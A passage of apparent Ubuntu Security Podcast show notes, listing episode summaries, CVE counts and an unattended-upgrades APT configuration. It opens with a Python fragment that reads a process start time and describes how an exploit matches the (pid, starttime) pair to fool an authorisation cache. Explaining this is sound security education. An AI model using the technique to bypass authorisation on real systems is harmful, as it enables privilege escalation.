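    # split on whitespace after the ')' that terminates it.
    fields = stat[stat.rindex(b")") + 2:].split()
    return int(fields[19])  # field 22 overall; fields[0] here is field 3

# The (pid, starttime) pair is what the authorisation cache keys on -
# the exploit arranges for a new process to match both values.
pid = os.getpid()
print(pid, start_time(pid))
```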
Jann also discovered that userfaultfd does not properly handle access control for certain ioctl() - which allowed local users to write data into holes in a tmpfs file, even if the user only had read-only access to the file
This week we cover security updates including Firefox, Thunderbird, OpenSSL and another Ghostscript regression, plus we look at a recent report from Capsule8 comparing Linux hardening features across various distributions and we answer some listener questions.
16 unique CVEs addressed
Double episode covering the security updates from the last 2 weeks, including snapd (DirtySock), systemd and more, plus we talk responsible disclosure and some open positions on the Ubuntu Security team.
15 unique CVEs addressed
This week we look at Linux kernel updates for all releases, OpenSSH, dovecot, curl and more. Plus we answer some frequently asked questions for Ubuntu security, in particular the perennial favourite of why we choose to just backport security fixes instead of doing rolling package version updates to resolve outstanding CVEs.
33 unique CVEs addressed
This week we look at updates to the Linux kernel in preparation for the 18.04.2 release, plus updates for Open vSwitch, Firefox, Avahi, LibVNCServer and more. We also revisit and discuss upstream changes to the mincore() system call to thwart page-cache side-channel attacks first discussed in Episode 17.
40 unique CVEs addressed
This week we look at some details of the 46 unique CVEs addressed across the supported Ubuntu releases and take a deep dive into the recent apt security bug.
46 unique CVEs addressed
First episode of 2019! This week we look at “System Down” in systemd, as well as updates for the Linux kernel, GnuPG, PolicyKit and more, and discuss a recent cache side-channel attack using the mincore() system call.
51 unique CVEs addressed across the supported Ubuntu releases.
Last episode for 2018! This week we look at CVEs in lxml, CUPS, pixman, FreeRDP & more, plus we discuss the security of home routers as evaluated by C-ITL.
21 unique CVEs addressed
Security updates for 29 CVEs including Perl, the kernel, OpenSSL (PortSmash) and more, plus in response to some listener questions, we discuss how to make sure you always have the latest security updates by using unattended-upgrades - see the example configuration below.
29 unique CVEs addressed
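For anyone wanting to set this up, installing the unattended-upgrades package and making sure the periodic APT settings are switched on is enough - e.g. /etc/apt/apt.conf.d/20auto-upgrades should contain:

```
APT::Periodic::Update-Package-Lists "1";
APT::Periodic::Unattended-Upgrade "1";
```

(Running sudo dpkg-reconfigure -plow unattended-upgrades will write this file for you, and /etc/apt/apt.conf.d/50unattended-upgrades controls which pockets/origins get applied automatically.)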
6 CVEs addressed in Cosmic, 2 in Bionic and Xenial
Episode 14 covered CVE-2018-6559 (overlayfs / user namespace directory names disclosure)
Episode 12 covered CVE-2018-17972 (procfs kernel stack disclosure)
3 CVEs discovered by Jann Horn (and one inadvertently caused by Jann too)
Vulnerability specific to the Ubuntu kernel used in Cosmic (18.10)
This week we look at some details of the 32 unique CVEs addressed across the supported Ubuntu releases and talk about open source software supply chain integrity and how Ubuntu fares compared to the recent npm event-stream compromise.
32 unique CVEs addressed
This week we look at some details of the 16 unique CVEs addressed across the supported Ubuntu releases and more.
16 unique CVEs addressed
This week we look at some details of the 33 unique CVEs addressed across the supported Ubuntu releases, including some significant updates for systemd and the kernel, plus we talk about even more Intel side-channel vulnerabilities and more.
33 unique CVEs addressed
This week we look at some details of the 23 unique CVEs addressed across the supported Ubuntu releases, discuss the latest purported Intel side-channel vulnerability PortSmash and more.
23 unique CVEs addressed
This week we look at some details of the 17 unique CVEs addressed across the supported Ubuntu releases, have a brief look at some Canonical presentations from LSS-EU and more.
17 unique CVEs addressed
This week we look at some details of the 61 unique CVEs addressed across the supported Ubuntu releases, with a particular focus on the recent Xorg vulnerability (CVE-2018-14665), plus Cosmic is now officially supported by the Security Team.
61 unique CVEs addressed
This week we look at some details of the 15 unique CVEs addressed across the supported Ubuntu releases and discuss some of the security relevant changes in Ubuntu 18.10, plus a refresh of the Ubuntu CVE tracker and more.
15 unique CVEs addressed
This week we look at some details of the 78 unique CVEs addressed across the supported Ubuntu releases, including yet more GhostScript and ImageMagick fixes, plus WebKitGTK, the Linux kernel and more.
78 unique CVEs addressed
This week we look at some details of the 17 unique CVEs addressed across the supported Ubuntu releases and more.
17 unique CVEs addressed
This week we look at some details of the 43 unique CVEs addressed across the supported Ubuntu releases and talk about the recently announced Extended Security Maintenance support for Ubuntu 14.04 Trusty Tahr.
43 unique CVEs addressed across the various supported releases of Ubuntu (Bionic, Xenial, Trusty and Precise ESM)
A quieter week in package updates - this week we look at some details of the 9 unique CVEs addressed across the supported Ubuntu releases and talk about various hardening guides for Ubuntu.
9 unique CVEs addressed
This week we look at 29 unique CVEs addressed across the supported Ubuntu releases, a discussion of the Main Inclusion Review process and recent news around the bubblewrap package, and open positions within the team.
29 unique CVEs addressed
83 unique CVEs addressed across the supported Ubuntu releases.